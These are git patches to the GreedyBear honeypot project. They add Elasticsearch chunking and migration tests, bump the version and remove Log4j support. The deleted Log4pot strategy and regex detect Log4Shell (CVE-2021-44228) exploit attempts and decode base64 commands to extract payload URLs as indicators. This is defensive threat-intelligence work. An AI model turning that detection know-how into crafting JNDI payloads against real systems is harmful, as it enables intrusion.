+    def test_chunk_boundaries_are_correct(self, mock_search_class, mock_q, mock_get_time_window):
+        """Each chunk should query the correct time range."""
         mock_search = Mock()
         mock_search_class.return_value = mock_search
         mock_search.query.return_value = mock_search
         mock_search.source.return_value = mock_search
         mock_search.scan.return_value = iter([])
 
-        window_start = datetime(2025, 1, 1, 12, 0, 0)
-        window_end = datetime(2025, 1, 1, 12, 10, 0)
-        mock_get_time_window.return_value = (window_start, window_end)
+        start = datetime(2025, 1, 1, 12, 0)
+        end = datetime(2025, 1, 1, 12, 30)
+        mock_get_time_window.return_value = (start, end)
 
-        self.repo.search(minutes_back_to_lookup=10)
+        list(self.repo.search(minutes_back_to_lookup=30))
 
-        mock_get_time_window.assert_called_once()
+        expected_calls = [
+            call("range", **{"@timestamp": {"gte": start, "lt": start + timedelta(minutes=10)}}),
+            call("range", **{"@timestamp": {"gte": start + timedelta(minutes=10), "lt": start + timedelta(minutes=20)}}),
+            call("range", **{"@timestamp": {"gte": start + timedelta(minutes=20), "lt": end}}),
+        ]
+        mock_q.assert_has_calls(expected_calls)
 
+    @patch("greedybear.cronjobs.repositories.elastic.EXTRACTION_INTERVAL", 10)
     @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
-    @patch("greedybear.cronjobs.repositories.elastic.datetime")
-    def test_standard_query_returns_correct_query(self, mock_datetime, mock_get_time_window):
-        now = datetime(2023, 1, 1, 0, 0, 0)
-        mock_datetime.now.return_value = now
-        window_start = "2022-12-31T23:50:00"
-        window_end = "2023-01-01T00:00:00"
-        mock_get_time_window.return_value = (window_start, window_end)
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    def test_equal_start_end_yields_no_chunks(self, mock_search_class, mock_get_time_window):
+        """When window_start == window_end, no chunks should be yielded."""
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+
+        same_time = datetime(2025, 1, 1, 12, 0)
+        mock_get_time_window.return_value = (same_time, same_time)
+
+        chunks = list(self.repo.search(minutes_back_to_lookup=10))
+
+        self.assertEqual(chunks, [])
+        mock_search.scan.assert_not_called()
+
+    @patch("greedybear.cronjobs.repositories.elastic.EXTRACTION_INTERVAL", 10)
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    def test_healthcheck_called_once_for_multiple_chunks(self, mock_search_class, mock_get_time_window):
+        """Healthcheck should run once before chunking, not per chunk."""
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+        mock_search.scan.return_value = iter([])
+
+        mock_get_time_window.return_value = (
+            datetime(2025, 1, 1, 12, 0),
+            datetime(2025, 1, 1, 12, 30),
+        )
+
+        list(self.repo.search(minutes_back_to_lookup=30))
+
+        self.mock_client.ping.assert_called_once()
+
+    @patch("greedybear.cronjobs.repositories.elastic.EXTRACTION_INTERVAL", 10)
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+    @patch("greedybear.cronjobs.repositories.elastic.Q")
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    def test_last_chunk_shorter_when_not_divisible(self, mock_search_class, mock_q, mock_get_time_window):
+        """A 25-minute window with 10-minute interval should yield 3 chunks, the last covering only 5 minutes."""
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+        mock_search.scan.return_value = iter([])
+
+        start = datetime(2025, 1, 1, 12, 0)
+        end = datetime(2025, 1, 1, 12, 25)
+        mock_get_time_window.return_value = (start, end)
 
-        q = self.repo._standard_query(minutes_back_to_lookup=10)
+        chunks = list(self.repo.search(minutes_back_to_lookup=25))
 
-        expected_dict = {"range": {"@timestamp": {"gte": window_start, "lt": window_end}}}
-        self.assertEqual(q.to_dict(), expected_dict)
-        mock_get_time_window.assert_called_once_with(now, 10)
+        self.assertEqual(len(chunks), 3)
+        expected_calls = [
+            call("range", **{"@timestamp": {"gte": start, "lt": start + timedelta(minutes=10)}}),
+            call("range", **{"@timestamp": {"gte": start + timedelta(minutes=10), "lt": start + timedelta(minutes=20)}}),
+            call("range", **{"@timestamp": {"gte": start + timedelta(minutes=20), "lt": end}}),
+        ]
+        mock_q.assert_has_calls(expected_calls)
 
 
 class TestTimeWindowCalculation(CustomTestCase):

From b108c89798d8c5e1763a74ff10fbf1463fbf8e8f Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Mon, 2 Feb 2026 08:13:38 +0100
Subject: [PATCH 73/75] Bump 3.0.0

---
 .env_template   | 2 +-
 docker/.version | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/.env_template b/.env_template
index 85c172c3..fb2e84a4 100644
--- a/.env_template
+++ b/.env_template
@@ -13,4 +13,4 @@ COMPOSE_FILE=docker/default.yml:docker/local.override.yml
 #COMPOSE_FILE=docker/default.yml:docker/local.override.yml:docker/elasticsearch.yml
 
 # If you want to run a specific version, populate this
-# REACT_APP_INTELOWL_VERSION="2.1.0"
+# REACT_APP_INTELOWL_VERSION="3.0.0"
diff --git a/docker/.version b/docker/.version
index f32f3526..37ece384 100644
--- a/docker/.version
+++ b/docker/.version
@@ -1 +1 @@
-REACT_APP_GREEDYBEAR_VERSION="2.1.0"
\ No newline at end of file
+REACT_APP_GREEDYBEAR_VERSION="3.0.0"
\ No newline at end of file

From e2fc8799b48d9a43f101d35e8fb3b01d2db9bb63 Mon Sep 17 00:00:00 2001
From: Dorna Raj Gyawali <dronarajgyawali@gmail.com>
Date: Tue, 3 Feb 2026 16:02:23 +0545
Subject: [PATCH 74/75] test(migrations): add migrations test . closes #746
 (#753)

* test(migrations): add migrations test

* resolve linter issue

* make CI use requirements-dev.txt and remove redundant coverage entry

* refactor/add testcase

* remove code snippet

* add test_runner & update migration test flow

* run migration tests in CI

---------

Co-authored-by: tim <46972822+regulartim@users.noreply.github.com>
---
 .../create_dev_requirements_file/action.yml   |  8 +-
 .github/workflows/_python.yml                 |  6 +-
 .github/workflows/pull_request_automation.yml |  3 +
 greedybear/settings.py                        |  3 +
 requirements/dev-requirements.txt             |  1 +
 tests/__init__.py                             | 25 +++++-
 tests/test_migrations.py                      | 76 +++++++++++++++++++
 tests/test_runner.py                          | 25 ++++++
 8 files changed, 138 insertions(+), 9 deletions(-)
 create mode 100644 tests/test_migrations.py
 create mode 100644 tests/test_runner.py

diff --git a/.github/actions/python_requirements/create_dev_requirements_file/action.yml b/.github/actions/python_requirements/create_dev_requirements_file/action.yml
index eb86a046..b11c58f2 100644
--- a/.github/actions/python_requirements/create_dev_requirements_file/action.yml
+++ b/.github/actions/python_requirements/create_dev_requirements_file/action.yml
@@ -8,9 +8,6 @@ inputs:
   project_dev_requirements_file:
     description: An additional project dev requirements file
     required: false
-  use_coverage:
-    description: Use coverage.py
-    required: false
 
 runs:
   using: "composite"
@@ -18,10 +15,7 @@ runs:
     - name: Create requirements-dev.txt
       run: |
         echo > requirements-dev.txt
-        if [[ '${{ inputs.use_coverage }}' != 'false' ]]; then
-          echo "coverage>=7.3.2" >> requirements-dev.txt
-        fi
-        if [[ -z '${{ inputs.project_dev_requirements_file }}' ]];then
+        if [[ -n '${{ inputs.project_dev_requirements_file }}' ]];then
           cat $(echo ${{ inputs.project_dev_requirements_file }}) >> requirements-dev.txt
         fi
       shell: bash
diff --git a/.github/workflows/_python.yml b/.github/workflows/_python.yml
index 044b163c..28fe71bb 100644
--- a/.github/workflows/_python.yml
+++ b/.github/workflows/_python.yml
@@ -20,6 +20,10 @@ on:
         description: Path to the requirements.txt file
         type: string
         required: true
+      project_dev_requirements_file:
+        description: Path to an additional project dev requirements file
+        type: string
+        required: false
       install_from:
         description: Directory that must be used to install the packages
         type: string
@@ -325,7 +329,7 @@ jobs:
         uses: ./.github/actions/python_requirements/create_dev_requirements_file
         with:
           install_from: ${{ inputs.install_from }}
-          use_coverage: ${{ inputs.use_coverage }}
+          project_dev_requirements_file: ${{ inputs.project_dev_requirements_file }}
 
       - name: Create docs requirements file
         uses: ./.github/actions/python_requirements/create_docs_requirements_file
diff --git a/.github/workflows/pull_request_automation.yml b/.github/workflows/pull_request_automation.yml
index e6b60b06..96c45d92 100644
--- a/.github/workflows/pull_request_automation.yml
+++ b/.github/workflows/pull_request_automation.yml
@@ -63,6 +63,7 @@ jobs:
       use_ruff_linter: true
 
       requirements_path: requirements/project-requirements.txt
+      project_dev_requirements_file: requirements/dev-requirements.txt
       packages_path: packages.txt
       django_settings_module: greedybear.settings
 
@@ -86,6 +87,8 @@ jobs:
       upload_coverage: true
       tags_for_slow_tests: main
 
+      custom_command: python manage.py test --tag=migration --failfast
+
       env: >-
         {
         "ENVIRONMENT": "ci",
diff --git a/greedybear/settings.py b/greedybear/settings.py
index d197280f..b5d6a994 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -421,3 +421,6 @@
 # Optional feed license URL to include in API responses
 # If not set, no license information will be included in feeds
 FEEDS_LICENSE = os.environ.get("FEEDS_LICENSE", "")
+
+# Project test runner
+TEST_RUNNER = "tests.test_runner.CustomTestRunner"
diff --git a/requirements/dev-requirements.txt b/requirements/dev-requirements.txt
index 3cf3908d..e0c6a9b0 100644
--- a/requirements/dev-requirements.txt
+++ b/requirements/dev-requirements.txt
@@ -2,3 +2,4 @@
 # Installed conditionally in Docker: INSTALL_DEV=true
 # For manual installation: pip install -r requirements/dev-requirements.txt
 coverage>=7.3.2
+django-test-migrations>=1.5.0
diff --git a/tests/__init__.py b/tests/__init__.py
index fdf715f9..6109d8c3 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -3,7 +3,8 @@
 from unittest.mock import Mock
 
 from certego_saas.apps.user.models import User
-from django.test import TestCase
+from django.test import TestCase, TransactionTestCase
+from django_test_migrations.migrator import Migrator
 
 from greedybear.models import (
     IOC,
@@ -247,6 +248,28 @@ def to_dict(self):
         return self._data.copy()
 
 
+class MigrationTestCase(TransactionTestCase):
+    """
+    Reusable base class for migration tests.
+    """
+
+    app_name = "greedybear"
+    migrate_from = None
+    migrate_to = None
+
+    def setUp(self):
+        super().setUp()
+        self.migrator = Migrator(database="default")
+        self.old_state = self.migrator.apply_initial_migration((self.app_name, self.migrate_from))
+
+    def apply_tested_migration(self):
+        return self.migrator.apply_tested_migration((self.app_name, self.migrate_to))
+
+    def tearDown(self):
+        self.migrator.reset()
+        super().tearDown()
+
+
 class E2ETestCase(ExtractionTestCase):
     """Base test case for E2E pipeline tests with real strategies.
 
diff --git a/tests/test_migrations.py b/tests/test_migrations.py
new file mode 100644
index 00000000..04898b0b
--- /dev/null
+++ b/tests/test_migrations.py
@@ -0,0 +1,76 @@
+from django.test import tag
+
+from . import MigrationTestCase
+
+
+@tag("migration")
+class TestRemoveHardcodedHoneypots(MigrationTestCase):
+    """Tests that hardcoded honeypots are removed only when no IOC references them."""
+
+    migrate_from = "0028_generalhoneypot_unique_generalhoneypot_name_ci"
+    migrate_to = "0029_remove_hardcoded_honeypots"
+
+    def test_honeypots_deleted_only_if_unused(self):
+        IOC = self.old_state.apps.get_model(self.app_name, "IOC")
+        GeneralHoneypot = self.old_state.apps.get_model(self.app_name, "GeneralHoneypot")
+
+        used_hp = GeneralHoneypot.objects.get(name="Ciscoasa")
+
+        ioc = IOC.objects.create()
+        ioc.general_honeypot.add(used_hp)
+
+        new_state = self.apply_tested_migration()
+        hp_new = new_state.apps.get_model(self.app_name, "GeneralHoneypot")
+
+        self.assertFalse(
+            hp_new.objects.filter(name="Heralding").exists(),
+            "Unused honeypot should be deleted",
+        )
+
+        self.assertTrue(
+            hp_new.objects.filter(name="Ciscoasa").exists(),
+            "Honeypot linked to IOC must not be deleted",
+        )
+
+
+@tag("migration")
+class TestCowrieLog4jMigration(MigrationTestCase):
+    """Tests migration of cowrie and log4j boolean flags into the GeneralHoneypot M2M relation."""
+
+    migrate_from = "0029_remove_hardcoded_honeypots"
+    migrate_to = "0030_migrate_cowrie_log4j"
+
+    def test_boolean_flags_are_migrated_to_m2m(self):
+        IOC = self.old_state.apps.get_model(self.app_name, "IOC")
+        self.old_state.apps.get_model(self.app_name, "GeneralHoneypot")
+
+        # creating iocs covering all flag combinations
+        ioc_cowrie = IOC.objects.create(cowrie=True, log4j=False)
+        ioc_log4j = IOC.objects.create(cowrie=False, log4j=True)
+        ioc_both = IOC.objects.create(cowrie=True, log4j=True)
+        ioc_none = IOC.objects.create(cowrie=False, log4j=False)
+
+        new_state = self.apply_tested_migration()
+        ioc_new = new_state.apps.get_model(self.app_name, "IOC")
+        hp_new = new_state.apps.get_model(self.app_name, "GeneralHoneypot")
+
+        # fetching migrated honeypots
+        cowrie_hp = hp_new.objects.get(name="Cowrie")
+        log4pot_hp = hp_new.objects.get(name="Log4pot")
+
+        self.assertEqual(
+            set(ioc_new.objects.get(id=ioc_cowrie.id).general_honeypot.all()),
+            {cowrie_hp},
+        )
+        self.assertEqual(
+            set(ioc_new.objects.get(id=ioc_log4j.id).general_honeypot.all()),
+            {log4pot_hp},
+        )
+        self.assertEqual(
+            set(ioc_new.objects.get(id=ioc_both.id).general_honeypot.all()),
+            {cowrie_hp, log4pot_hp},
+        )
+        self.assertEqual(
+            ioc_new.objects.get(id=ioc_none.id).general_honeypot.count(),
+            0,
+        )
diff --git a/tests/test_runner.py b/tests/test_runner.py
new file mode 100644
index 00000000..a14f2fb9
--- /dev/null
+++ b/tests/test_runner.py
@@ -0,0 +1,25 @@
+import sys
+
+from django.test.runner import DiscoverRunner
+
+
+class CustomTestRunner(DiscoverRunner):
+    def __init__(self, *args, **kwargs):
+        kwargs = self.migration_test_config(kwargs)
+        super().__init__(*args, **kwargs)
+
+    def migration_test_config(self, kwargs):
+        "Detects if migration tests are requested and updates exclude_tags."
+        migration_requested = "--tag=migration" in sys.argv or any("test_migrations" in arg for arg in sys.argv)
+
+        if migration_requested:
+            print("\nRunning migration tests\n")
+        else:
+            current_exclude_tags = kwargs.get("exclude_tags") or set()
+            if not isinstance(current_exclude_tags, set):
+                current_exclude_tags = set(current_exclude_tags)
+            current_exclude_tags.add("migration")
+            kwargs["exclude_tags"] = current_exclude_tags
+            print("\nAuto-excluding migration tests (use --tag=migration to run them)\n")
+
+        return kwargs

From 3d0ea32bc7ad2bd70e333f36c070873404918420 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 3 Feb 2026 11:17:40 +0100
Subject: [PATCH 75/75] Remove Log4j. Closes #410 and #635 (#760)

* remove strategy and related code

* update URL in readme

* replace log4j occurrences in docstrings

* remove log4j references from frontend test

* remove log4j from several docstrings
---
 README.md                                     |   2 +-
 api/views/feeds.py                            |   6 +-
 .../tests/components/feeds/Feeds.test.jsx     |  10 +-
 greedybear/consts.py                          |   4 -
 .../extraction/strategies/__init__.py         |   1 -
 .../cronjobs/extraction/strategies/factory.py |   2 -
 .../cronjobs/extraction/strategies/log4pot.py | 150 ------------------
 greedybear/cronjobs/repositories/ioc.py       |   5 +-
 greedybear/cronjobs/scoring/utils.py          |   2 +-
 greedybear/regex.py                           |   1 -
 .../cronjobs/test_extraction_pipeline_e2e.py  |  84 +---------
 .../test_extraction_pipeline_factory.py       |  13 --
 12 files changed, 16 insertions(+), 264 deletions(-)
 delete mode 100644 greedybear/cronjobs/extraction/strategies/log4pot.py

diff --git a/README.md b/README.md
index acb57d4c..b1452bf9 100644
--- a/README.md
+++ b/README.md
@@ -21,7 +21,7 @@ Documentation about GreedyBear installation, usage, configuration and contributi
 
 ## Public feeds
 
-There are public feeds provided by [The Honeynet Project](https://www.honeynet.org) in this [site](https://greedybear.honeynet.org). [Example](https://greedybear.honeynet.org/api/feeds/log4j/all/recent.txt)
+There are public feeds provided by [The Honeynet Project](https://www.honeynet.org) in this [site](https://greedybear.honeynet.org). [Example](https://greedybear.honeynet.org/api/feeds/cowrie/all/recent.txt)
 
 Please do not perform too many requests to extract feeds or you will be banned.
 
diff --git a/api/views/feeds.py b/api/views/feeds.py
index c6e56524..37890f53 100644
--- a/api/views/feeds.py
+++ b/api/views/feeds.py
@@ -32,7 +32,7 @@ def feeds(request, feed_type, attack_type, prioritize, format_):
 
     Args:
         request: The incoming request object.
-        feed_type (str): Type of feed (e.g., log4j, cowrie, etc.).
+        feed_type (str): Type of feed (e.g. cowrie, honeytrap, etc.).
         attack_type (str): Type of attack (e.g., all, specific attack types).
         prioritize (str): Prioritization mechanism to use (e.g., recent, persistent).
         format_ (str): Desired format of the response (e.g., json, csv, txt).
@@ -91,7 +91,7 @@ def feeds_advanced(request):
 
     Args:
         request: The incoming request object.
-        feed_type (str): Type of feed to retrieve. (supported: `cowrie`, `log4j`, etc.; default: `all`)
+        feed_type (str): Type of feed to retrieve. (supported: `cowrie`, `honeytrap`, etc.; default: `all`)
         attack_type (str): Type of attack to filter. (supported: `scanner`, `payload_request`, `all`; default: `all`)
         max_age (int): Maximum number of days since last occurrence. E.g. an IOC that was last seen 4 days ago is excluded by default. (default: 3)
         min_days_seen (int): Minimum number of days on which an IOC must have been seen. (default: 1)
@@ -130,7 +130,7 @@ def feeds_asn(request):
 
     Args:
         request: The HTTP request object.
-        feed_type (str): Filter by feed type (e.g., 'cowrie', 'log4j'). Default: 'all'.
+        feed_type (str): Filter by feed type (e.g. 'cowrie', 'honeytrap'). Default: 'all'.
         attack_type (str): Filter by attack type (e.g., 'scanner', 'payload_request'). Default: 'all'.
         max_age (int): Maximum age of IOCs in days. Default: 3.
         min_days_seen (int): Minimum days an IOC must have been observed. Default: 1.
diff --git a/frontend/tests/components/feeds/Feeds.test.jsx b/frontend/tests/components/feeds/Feeds.test.jsx
index 53b5f162..97967a4d 100644
--- a/frontend/tests/components/feeds/Feeds.test.jsx
+++ b/frontend/tests/components/feeds/Feeds.test.jsx
@@ -21,7 +21,7 @@ jest.mock("@certego/certego-ui", () => {
           first_seen: "2023-03-15",
           last_seen: "2023-03-15",
           attack_count: 1,
-          feed_type: "log4j",
+          feed_type: "cowrie",
         },
       ],
     },
@@ -38,7 +38,7 @@ jest.mock("@certego/certego-ui", () => {
     ...originalModule,
 
     useAxiosComponentLoader: jest.fn(() => [
-      ["Honeytrap", "Glutton", "CitrixHoneypot", "Log4j", "Cowrie"],
+      ["Honeytrap", "Glutton", "CitrixHoneypot", "Cowrie"],
       loader,
     ]),
 
@@ -88,7 +88,7 @@ describe("Feeds component", () => {
       "/api/feeds/all/all/recent.json"
     );
 
-    await user.selectOptions(feedTypeSelectElement, "log4j");
+    await user.selectOptions(feedTypeSelectElement, "cowrie");
     await user.selectOptions(attackTypeSelectElement, "scanner");
     await user.selectOptions(iocTypeSelectElement, "ip");
     await user.selectOptions(prioritizationSelectElement, "persistent");
@@ -97,7 +97,7 @@ describe("Feeds component", () => {
       // check link has been changed including ioc_type parameter
       expect(buttonRawData).toHaveAttribute(
         "href",
-        "/api/feeds/log4j/scanner/persistent.json?ioc_type=ip"
+        "/api/feeds/cowrie/scanner/persistent.json?ioc_type=ip"
       );
     });
 
@@ -106,7 +106,7 @@ describe("Feeds component", () => {
     await waitFor(() => {
       expect(buttonRawData).toHaveAttribute(
         "href",
-        "/api/feeds/log4j/scanner/persistent.json?ioc_type=domain"
+        "/api/feeds/cowrie/scanner/persistent.json?ioc_type=domain"
       );
     });
   });
diff --git a/greedybear/consts.py b/greedybear/consts.py
index 0e8eefe6..fb3af390 100644
--- a/greedybear/consts.py
+++ b/greedybear/consts.py
@@ -19,12 +19,8 @@
     "dest_port",
     "ip_rep",
     "geoip",
-    "deobfuscated_payload",
-    "correlation_id",
     "url",
     "message",
-    "reason",
-    "correlation_id",
     "eventid",
     "session",
     "timestamp",
diff --git a/greedybear/cronjobs/extraction/strategies/__init__.py b/greedybear/cronjobs/extraction/strategies/__init__.py
index ea386477..b3d4612e 100644
--- a/greedybear/cronjobs/extraction/strategies/__init__.py
+++ b/greedybear/cronjobs/extraction/strategies/__init__.py
@@ -1,4 +1,3 @@
 from greedybear.cronjobs.extraction.strategies.base import *
 from greedybear.cronjobs.extraction.strategies.cowrie import *
 from greedybear.cronjobs.extraction.strategies.generic import *
-from greedybear.cronjobs.extraction.strategies.log4pot import *
diff --git a/greedybear/cronjobs/extraction/strategies/factory.py b/greedybear/cronjobs/extraction/strategies/factory.py
index 4efdf11a..c7e7a07d 100644
--- a/greedybear/cronjobs/extraction/strategies/factory.py
+++ b/greedybear/cronjobs/extraction/strategies/factory.py
@@ -2,7 +2,6 @@
     BaseExtractionStrategy,
     CowrieExtractionStrategy,
     GenericExtractionStrategy,
-    Log4potExtractionStrategy,
 )
 from greedybear.cronjobs.repositories import IocRepository, SensorRepository
 
@@ -26,7 +25,6 @@ def __init__(self, ioc_repo: IocRepository, sensor_repo: SensorRepository):
         self.sensor_repo = sensor_repo
         self._strategies = {
             "Cowrie": lambda: CowrieExtractionStrategy("Cowrie", self.ioc_repo, self.sensor_repo),
-            "Log4pot": lambda: Log4potExtractionStrategy("Log4pot", self.ioc_repo, self.sensor_repo),
         }
 
     def get_strategy(self, honeypot: str) -> BaseExtractionStrategy:
diff --git a/greedybear/cronjobs/extraction/strategies/log4pot.py b/greedybear/cronjobs/extraction/strategies/log4pot.py
deleted file mode 100644
index 879b14cb..00000000
--- a/greedybear/cronjobs/extraction/strategies/log4pot.py
+++ /dev/null
@@ -1,150 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-import base64
-import re
-from urllib.parse import urlparse
-
-from greedybear.consts import PAYLOAD_REQUEST, SCANNER
-from greedybear.cronjobs.extraction.strategies import BaseExtractionStrategy
-from greedybear.cronjobs.extraction.utils import get_ioc_type
-from greedybear.cronjobs.repositories import IocRepository, SensorRepository
-from greedybear.models import IOC
-from greedybear.regex import REGEX_CVE_BASE64COMMAND, REGEX_CVE_URL, REGEX_URL
-
-
-class Log4potExtractionStrategy(BaseExtractionStrategy):
-    """
-    Extraction strategy for Log4pot honeypot (CVE-2021-44228).
-    Extracts scanner IPs, payload URLs from JNDI/LDAP exploit attempts,
-    and hidden URLs from base64-encoded commands. Links related IOCs
-    (scanners to payload hosts) via foreign key relationships.
-    """
-
-    def __init__(
-        self,
-        honeypot: str,
-        ioc_repo: IocRepository,
-        sensor_repo: SensorRepository,
-    ):
-        super().__init__(honeypot, ioc_repo, sensor_repo)
-
-    def extract_from_hits(self, hits: list[dict]) -> None:
-        # we want to get only probes that tried to exploit the specific log4j CVE
-        hits = [hit for hit in hits if hit.get("reason", "") == "exploit"]
-
-        url = None
-        hostname = None
-        hidden_url = None
-        hidden_hostname = None
-        added_scanners = 0
-        added_payloads = 0
-        added_hidden_payloads = 0
-
-        for hit in hits:
-            scanner_ip = self._get_scanner_ip(hit["correlation_id"], hits)
-
-            match = re.search(REGEX_CVE_URL, hit["deobfuscated_payload"])
-            if match:
-                # we are losing the protocol but that's ok for now
-                url = match.group()
-                url_adjusted = "tcp:" + url
-                # removing double slash
-                url = url[2:]
-                self.log.info(f"found URL {url} in payload for CVE-2021-44228")
-                # protocol required or extraction won't work
-                hostname = urlparse(url_adjusted).hostname
-                self.log.info(f"extracted hostname {hostname} from {url}")
-
-            # it is possible to extract another payload from base64 encoded string.
-            # this is a behavior related to the attack that leverages LDAP
-            match_command = re.search(REGEX_CVE_BASE64COMMAND, hit["deobfuscated_payload"])
-            if match_command:
-                # we are losing the protocol but that's ok for now
-                base64_encoded = match_command.group(1)
-                self.log.info(f"found base64 encoded command {base64_encoded} in payload from base64 code for CVE-2021-44228")
-                try:
-                    decoded_str = base64.b64decode(base64_encoded).decode()
-                    self.log.info(f"decoded base64 command to {decoded_str} from payload from base64 code for CVE-2021-44228")
-                except Exception as e:
-                    self.log.warning(e, stack_info=True)
-                else:
-                    match_url = re.search(REGEX_URL, decoded_str)
-                    if match_url:
-                        hidden_url = match_url.group()
-                        if "://" not in hidden_url:
-                            hidden_url = "tcp://" + hidden_url
-                        self.log.info(f"found hidden URL {hidden_url} in payload for CVE-2021-44228")
-
-                        hidden_hostname = urlparse(hidden_url).hostname
-                        self.log.info(f"extracted hostname {hidden_hostname} from {hidden_url}")
-
-            # add scanner
-            if scanner_ip:
-                ioc = IOC(name=scanner_ip, type=get_ioc_type(scanner_ip))
-                self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="Log4pot")
-                added_scanners += 1
-
-            # add first URL
-            if hostname:
-                related_urls = [url] if url else []
-                ioc = IOC(
-                    name=scanner_ip,
-                    type=get_ioc_type(scanner_ip),
-                    related_urls=related_urls,
-                )
-                self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="Log4pot")
-                added_payloads += 1
-
-            # add hidden URL
-            if hidden_hostname:
-                related_urls = [hidden_url] if hidden_url else []
-                ioc = IOC(
-                    name=hostname,
-                    type=get_ioc_type(hostname),
-                    related_urls=related_urls,
-                )
-                self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST, general_honeypot_name="Log4pot")
-                added_hidden_payloads += 1
-
-            # once all have added, we can add the foreign keys
-            self._add_fks(scanner_ip, hostname, hidden_hostname)
-
-        self.log.info(f"added {added_scanners} scanners, {added_payloads} payloads and {added_hidden_payloads} hidden payloads")
-
-    def _add_fks(self, scanner_ip: str, hostname: str, hidden_hostname: str) -> None:
-        self.log.info(f"adding foreign keys for the following iocs: {scanner_ip}, {hostname}, {hidden_hostname}")
-        scanner_ip_instance = self.ioc_repo.get_ioc_by_name(scanner_ip)
-        hostname_instance = self.ioc_repo.get_ioc_by_name(hostname)
-        hidden_hostname_instance = self.ioc_repo.get_ioc_by_name(hidden_hostname)
-
-        if scanner_ip_instance is not None:
-            if hostname_instance and hostname_instance not in scanner_ip_instance.related_ioc.all():
-                scanner_ip_instance.related_ioc.add(hostname_instance)
-            if hidden_hostname_instance and hidden_hostname_instance not in scanner_ip_instance.related_ioc.all():
-                scanner_ip_instance.related_ioc.add(hidden_hostname_instance)
-            self.ioc_repo.save(scanner_ip_instance)
-
-        if hostname_instance is not None:
-            if scanner_ip_instance and scanner_ip_instance not in hostname_instance.related_ioc.all():
-                hostname_instance.related_ioc.add(scanner_ip_instance)
-            if hidden_hostname_instance and hidden_hostname_instance not in hostname_instance.related_ioc.all():
-                hostname_instance.related_ioc.add(hidden_hostname_instance)
-            self.ioc_repo.save(hostname_instance)
-
-        if hidden_hostname_instance is not None:
-            if hostname_instance and hostname_instance not in hidden_hostname_instance.related_ioc.all():
-                hidden_hostname_instance.related_ioc.add(hostname_instance)
-            if scanner_ip_instance and scanner_ip_instance not in hidden_hostname_instance.related_ioc.all():
-                hidden_hostname_instance.related_ioc.add(scanner_ip_instance)
-            self.ioc_repo.save(hidden_hostname_instance)
-
-    def _get_scanner_ip(self, correlation_id: str, hits: list[dict]) -> str | None:
-        self.log.info(f"extracting scanner IP from correlation_id {correlation_id}")
-        filtered_hits = [hit for hit in hits if str(hit.get("correlation_id", "")) == str(correlation_id) and hit.get("reason", "") == "request"]
-
-        if not filtered_hits:
-            self.log.warning(f"scanner IP was not extracted from correlation_id {correlation_id}")
-            return None
-        scanner_ip = filtered_hits[0]["src_ip"]
-        self.log.info(f"extracted scanner IP {scanner_ip} from correlation_id {correlation_id}")
-        return scanner_ip
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index a63bd354..ddeb1c9f 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -164,9 +164,8 @@ def get_scanners_for_scoring(self, score_fields: list[str]) -> list[IOC]:
         """
         Get all scanners associated with active honeypots for scoring.
 
-        Retrieves IOCs that are marked as scanners and are associated with either
-        Cowrie, Log4j, or active general honeypots. Returns only the name field
-        and specified score fields for efficiency.
+        Retrieves IOCs that are marked as scanners and are associated with any
+        active honeypot. Returns only the name field and specified score fields for efficiency.
 
         Args:
             score_fields: List of score field names to retrieve (e.g., ['recurrence_probability']).
diff --git a/greedybear/cronjobs/scoring/utils.py b/greedybear/cronjobs/scoring/utils.py
index 6e097203..a7f2b383 100644
--- a/greedybear/cronjobs/scoring/utils.py
+++ b/greedybear/cronjobs/scoring/utils.py
@@ -169,7 +169,7 @@ def get_current_data(days_lookback: int = 30, ioc_repo=None) -> list[dict]:
     Retrieves IOCs that:
     - Are scanners
     - Were seen in the specified lookback period
-    - Are associated with either Cowrie, Log4j, or active general honeypots
+    - Are associated with any active honeypot
 
     Args:
         days_lookback: Number of days to look back for last_seen timestamp.
diff --git a/greedybear/regex.py b/greedybear/regex.py
index 57e0a269..f9fab79e 100644
--- a/greedybear/regex.py
+++ b/greedybear/regex.py
@@ -1,6 +1,5 @@
 # This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
 # See the file 'LICENSE' for copying permission.
 REGEX_CVE_URL = r"//[a-zA-Z\d_-]{1,200}(?:\.[a-zA-Z\d_-]{1,200})+(?::\d{2,6})?(?:/[a-zA-Z\d_=-]{1,200})*(?:\.\w+)?"
-REGEX_CVE_BASE64COMMAND = r"/Command/Base64/((?:[a-zA-Z\+\/\d]+)(?:={0,3}))}"
 REGEX_URL = REGEX_CVE_URL[2:]
 REGEX_URL_PROTOCOL = r"(?:htt|ft|tc|lda)ps?:?" + REGEX_CVE_URL
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
index d37e9dd1..54104caf 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
@@ -88,73 +88,6 @@ def test_cowrie_extracts_login_credentials(self, mock_session_repo, mock_scores)
